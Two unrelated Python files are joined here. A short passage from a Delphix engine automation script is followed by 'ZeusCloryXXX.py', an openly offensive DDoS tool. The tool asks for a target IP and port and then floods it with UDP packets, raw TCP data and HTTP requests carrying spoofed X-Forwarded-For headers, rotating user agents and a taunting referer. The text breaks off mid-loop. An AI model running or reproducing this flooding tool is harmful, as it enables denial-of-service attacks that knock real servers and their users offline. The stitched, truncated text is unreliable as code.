except DlpxException as e:
print_exception('Error encountered in run_job():\n{}'.format(e))
sys.exit(1)
elif arguments['--all'] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dlpx_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
arguments['--engine']))
except (DlpxException, RequestError, KeyError):
raise DlpxException('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value and'
' try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dlpx_obj.dlpx_engines:
if dlpx_obj.dlpx_engines[delphix_engine]['default'] == 'true':
engine = dlpx_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dlpx_obj.dlpx_engines[delphix_engine]['hostname']))
break
if engine is None:
raise DlpxException('\nERROR: No default engine found. Exiting')
# run the job against the engine
threads.append(main_workflow(engine, dlpx_obj))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def main():
# We want to be able to call on these variables anywhere in the script.
global single_thread
global debug
time_start = time()
single_thread = False
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
config_file_path = arguments['--config']
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job(dx_session_obj, config_file_path)
elapsed_minutes = time_elapsed(time_start)
print_info('script took {:.2f} minutes to get this far.'.format(
elapsed_minutes))
# Here we handle what we do when the unexpected happens
except SystemExit as e:
# This is what we use to handle our sys.exit(#)
sys.exit(e)
except DlpxException as e:
# We use this exception handler when an error occurs in a function call.
        print_exception('ERROR: Please check the ERROR message below:\n'
                        '{}'.format(e))
sys.exit(2)
except HttpError as e:
# We use this exception handler when our connection to Delphix fails
        print_exception('ERROR: Connection failed to the Delphix Engine. '
                        'Please check the ERROR message below:\n{}'.format(e))
sys.exit(2)
except JobError as e:
# We use this exception handler when a job fails in Delphix so that we
# have actionable data
print_exception('A job failed in the Delphix Engine:\n{}'.format(e.job))
elapsed_minutes = time_elapsed(time_start)
print_exception('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
sys.exit(3)
except KeyboardInterrupt:
# We use this exception handler to gracefully handle ctrl+c exits
print_debug('You sent a CTRL+C to interrupt the process')
elapsed_minutes = time_elapsed(time_start)
print_info('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
except:
# Everything else gets caught here
print_exception('{}\n{}'.format(sys.exc_info()[0],
traceback.format_exc()))
elapsed_minutes = time_elapsed(time_start)
print_info("{} took {:.2f} minutes to get this far".format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main()
|
ZeusCloryXXX.py
|
import os, sys, codecs
try:
    import socks, requests, wget, cfscrape, urllib3
except ImportError:
    if sys.platform.startswith(("linux", "freebsd")):
        os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
    else:
        os.system("pip install pysocks requests wget cfscrape urllib3 scapy")
    # Retry the imports now that the dependencies have been installed.
    import socks, requests, wget, cfscrape, urllib3
import random
import socket
import threading
import time
useragents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n']
referers = [
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',]
print("""TUNGGU ZEUS CLORY OPEN KEY""")
time.sleep(5)
os.system("clear")
print("\033[95m")
print("""
ZeusCloryUs-Attack
""")
print("""\033[91m
||DONT ABUSE BRO ||
#==========================================#
| Follow My Sosmedia!!!! |
| AUTHOR : ZeusClory#3399 |
| github : https://github.com/ZeusClory |
| youtube : https://youtube.com/ZeusClory|
#===========================================#""")
print("\033[92m")
print("""
██╗░░██╗██████╗░██╗░░░██╗██╗░░░██╗██╗░░░██╗
╚██╗██╔╝██╔══██╗╚██╗░██╔╝██║░░░██║██║░░░██║
░╚███╔╝░██████╔╝░╚████╔╝░██║░░░██║██║░░░██║
░██╔██╗░██╔══██╗░░╚██╔╝░░██║░░░██║██║░░░██║
██╔╝╚██╗██║░░██║░░░██║░░░╚██████╔╝╚██████╔╝
╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░░╚═════╝░░╚═════╝░
██████╗░██████╗░░█████╗░░██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝
██║░░██║██║░░██║██║░░██║╚█████╗░
██║░░██║██║░░██║██║░░██║░╚═══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝
╚═════╝░╚═════╝░░╚════╝░╚═════╝░
""")
print("\033[95m")
print("""
•MODE NYA PILIH SALAH SATU|•
| UDP | TCP | GET |""")
print("\033[92m")
ip = str(input("[ ====> ] IP/HOST : "))
port = int(input("[ ====> ] PORT HOST : "))
choice = str(input("[ ====> ] METHOD : "))
times = int(input("[ ====> ] PACKETS : "))
threads = int(input("[ ====> ] THREADS : "))
def udp():
data = random._urandom(666)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (str(ip),int(port))
for x in range(times):
s.sendto(data,addr)
print(+"\033[0;37;50m ATTACK IP %s \033[95mAND PORT %s WITH UDP"%(ip,port))
except:
print("\033[0;37;95m Zeus-Clory Attack IP %s \033[92m And Port %s"%(ip,port))
def tcp():
data = random._urandom(102489)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(data)
for x in range(times):
s.send(data)
except:
s.close()
print("\033[1;31;95m ATTACK IP %s AND PORT %s WITH METHOD TCP"%(ip,port))
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def Headers(method):
header = ""
if method == "get" or method == "head":
post_host = "POST /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
accept = random.choice(acceptall) + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
randomip = str(random.randint(1,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
forward = "X-Forwarded-For: 1\r\n"
forward += "Client-IP: 10000\r\n"
length = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
header = post_host + referer + forward + useragent + accept + content + connection + length + "\r\n\r\n"
return header
os.system('color ' +random.choice(['D'])+ " & cls & title ZeusClory [Ddos]")
def get():
header = Headers("get")
i = random.choice(("[*]","[!]","[#]"))
data = random._urandom(10299)
if choice == "1":
get_host = "GET /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
else:
get_host = random.choice(['GET','POST','HEAD']) + " /Your_Server_Bypassed_By_ZeusCloey HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((ip,port))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
